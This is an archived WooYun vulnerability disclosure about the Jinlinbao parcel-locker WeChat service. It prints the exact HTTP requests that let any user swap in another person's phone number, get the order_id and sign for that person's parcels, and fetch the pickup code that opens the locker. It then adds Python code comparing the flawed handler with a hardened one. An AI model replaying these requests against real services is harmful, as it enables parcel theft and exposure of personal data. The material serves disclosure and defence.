WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
2016-03-31: Details reported to the vendor, awaiting vendor handling
2016-03-31: Vendor confirmed; details disclosed to the vendor only
2016-04-10: Details disclosed to core white hats and domain experts
2016-04-20: Details disclosed to ordinary white hats
2016-04-30: Details disclosed to intern white hats
2016-05-15: Details disclosed to the public
近邻宝 (Jinlinbao) lets anyone collect other people's parcels; only the phone number is needed

近邻宝 can be used to collect parcels on someone else's behalf as long as their phone number is known. In the 近邻宝 WeChat enterprise account, first bind a phone number, then intercept the request issued from "Pick up parcel" => "Pending" in the bottom-left corner:
POST /weixin/ordinary/customer/get/not/receive/list/ HTTP/1.1
Accept-Language: zh-CN
X-Requested-With: XMLHttpRequest
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Referer: http://snsbroker.jinlb.cn/weixin/ordinary/customer/my/receive/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.1; zh-cn; 2013022 Build/HM2013022) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
Origin: http://snsbroker.jinlb.cn
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
Host: snsbroker.jinlb.cn
Cookie: ltype=not_rece; session_id=9f9881c6a5384e59f25540633c34191eb807cda1
Content-Length: 24

phone=13521993016&page=1
Changing the phone parameter returns the uncollected parcels of that phone number, including each parcel's order_id and sign; one order_id corresponds to exactly one sign. The server uses the client-supplied phone rather than the one bound to the session, so the lookup is not tied to the logged-in user.

With those two parameters, the following request is sent:
GET /weixin/ordinary/customer/order/detail?order_id=5574445&sign=9c79ae32889e4f8eaed09cc456191e6d&ltype=rece HTTP/1.1
Referer: http://snsbroker.jinlb.cn/weixin/ordinary/customer/my/receive/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.1; zh-cn; 2013022 Build/HM2013022) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Accept-Encoding: gzip
Host: snsbroker.jinlb.cn
Cookie: ltype=not_rece; session_id=9f9881c6a5384e59f25540633c34191eb807cda1
The response contains the pickup code, and with the pickup code the locker can be opened and the parcel taken.
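The root cause is that both endpoints treat identifiers the client supplies (first phone, then order_id plus sign) as proof of entitlement. The following is an added example, not 近邻宝's own code: a handler that mirrors the reported behaviour beside a hardened one that derives the recipient from the server-side session and checks ownership before comparing the sign; all names and data are constructed.

```python
import hmac

# Constructed data standing in for the service's stores (not 近邻宝's code).
SESSIONS = {  # session_id -> phone number bound to that WeChat user
    "sess-alice": "13800000001",
    "sess-bob": "13800000002",
}
ORDERS = {  # order_id -> (recipient phone, server-issued sign, pickup code)
    "7001": ("13800000001", "sign-a1", "4471"),
    "7002": ("13800000002", "sign-b2", "9902"),
}


def pending_list_vulnerable(session_id, form):
    """Mirrors the reported flaw: the recipient phone is read from the
    request body, so any logged-in user can list another phone's parcels."""
    if session_id not in SESSIONS:
        return 401, []
    phone = form.get("phone")
    return 200, [{"order_id": oid, "sign": sign}
                 for oid, (owner, sign, _) in ORDERS.items() if owner == phone]


def pending_list_fixed(session_id, form):
    """Hardened: the phone comes from the server-side session. A client
    `phone` that disagrees is rejected (and worth alerting on as a probe)."""
    phone = SESSIONS.get(session_id)
    if phone is None:
        return 401, []
    if form.get("phone", phone) != phone:
        return 403, []
    return 200, [{"order_id": oid, "sign": sign}
                 for oid, (owner, sign, _) in ORDERS.items() if owner == phone]


def order_detail_fixed(session_id, order_id, sign):
    """Detail endpoint: knowing order_id+sign is not authorization. The order
    must belong to the session's phone; the sign is compared in constant time."""
    phone = SESSIONS.get(session_id)
    rec = ORDERS.get(order_id)
    if phone is None or rec is None or rec[0] != phone:
        return 403, None
    if not hmac.compare_digest(rec[1], sign):
        return 403, None
    return 200, {"order_id": order_id, "pickup_code": rec[2]}
```

A rejected mismatch between the session's phone and a supplied phone is a useful detection signal, since legitimate clients never send a different number.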
Severity: High
Vulnerability Rank: 15
Confirmed: 2016-03-31 19:15
Thank you.
None.